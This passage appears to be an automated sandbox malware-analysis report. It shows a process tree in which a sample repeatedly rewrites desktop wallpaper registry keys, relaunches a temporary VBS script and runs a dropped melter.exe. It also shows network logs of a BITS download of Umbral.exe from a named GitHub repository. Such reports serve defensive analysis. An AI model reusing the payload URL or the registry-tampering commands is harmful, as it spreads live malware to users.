C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6464
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4336
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6464
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4960
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4840
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4960
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7180
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7192
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7224
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7236
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7276
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7288
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7304
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7332
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7340
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7364
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7396
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7408
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7424
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7444
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7468
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7480
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7492
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7524
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7564
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7588
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7616
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7644
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7660
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7672
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7684
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7712
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7760
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7776
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7796
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7824
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7844
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7868
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7880
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7892
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7920
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7928
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7948
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7972
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7984
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:8016
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8084
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:8116
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8136
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8164
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8176
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8188
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:2440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:232
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:3012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1476
-
-
C:\Users\Admin\AppData\Local\Temp\melter.exemelter.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1256
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3d0 0x4781⤵PID:1932
Network
-
Remote address:8.8.8.8:53Request73.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:20.26.156.215:443RequestHEAD /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com 
copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0719:655EF0:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=0-1119
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0763:655F3F:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=1120-3325
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A092F:65613E:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=3326-7624
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0B03:65632E:66B5F495
-
Remote address: 20.26.156.215:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=7625-18493
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0C21:656450:66B5F497
-
Remote address: 20.26.156.215:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=18494-34811
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0CAF:6564EF:66B5F499
-
Remote address: 20.26.156.215:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=34812-75005
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0D56:65659A:66B5F49A
-
Remote address: 20.26.156.215:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=75006-162434
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0DC0:656624:66B5F49B
-
Remote address: 20.26.156.215:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=162435-235007
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-length: 0
x-github-request-id: FB6C:3227D6:5A0E88:6566F7:66B5F49D
-
Remote address: 8.8.8.8:53
Request
raw.githubusercontent.com IN A
Response
raw.githubusercontent.com IN A 185.199.111.133
raw.githubusercontent.com IN A 185.199.108.133
raw.githubusercontent.com IN A 185.199.110.133
raw.githubusercontent.com IN A 185.199.109.133
-
HEAD https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
HEAD /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 200
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
date: Fri, 09 Aug 2024 10:50:58 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1723200658.466123,VS0,VE131
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: fa8deeeae9405a61332bbdf805556605da60ae9b
expires: Fri, 09 Aug 2024 10:55:58 GMT
source-age: 0
content-length: 235008
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=0-1119
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 0-1119/235008
date: Fri, 09 Aug 2024 10:50:58 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200659.679473,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: e16bc1d3df62624a57e67ef717d0085da8a6aec6
expires: Fri, 09 Aug 2024 10:55:58 GMT
source-age: 0
content-length: 1120
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=1120-3325
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 1120-3325/235008
date: Fri, 09 Aug 2024 10:51:01 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200662.525629,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: c32cf7ee898682b9ba40febf90e365f43b2913cd
expires: Fri, 09 Aug 2024 10:56:01 GMT
source-age: 3
content-length: 2206
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=3326-7624
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 3326-7624/235008
date: Fri, 09 Aug 2024 10:51:03 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200664.761020,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: f916357d50515538dbe35f456a65273cf8041640
expires: Fri, 09 Aug 2024 10:56:03 GMT
source-age: 5
content-length: 4299
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=7625-18493
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
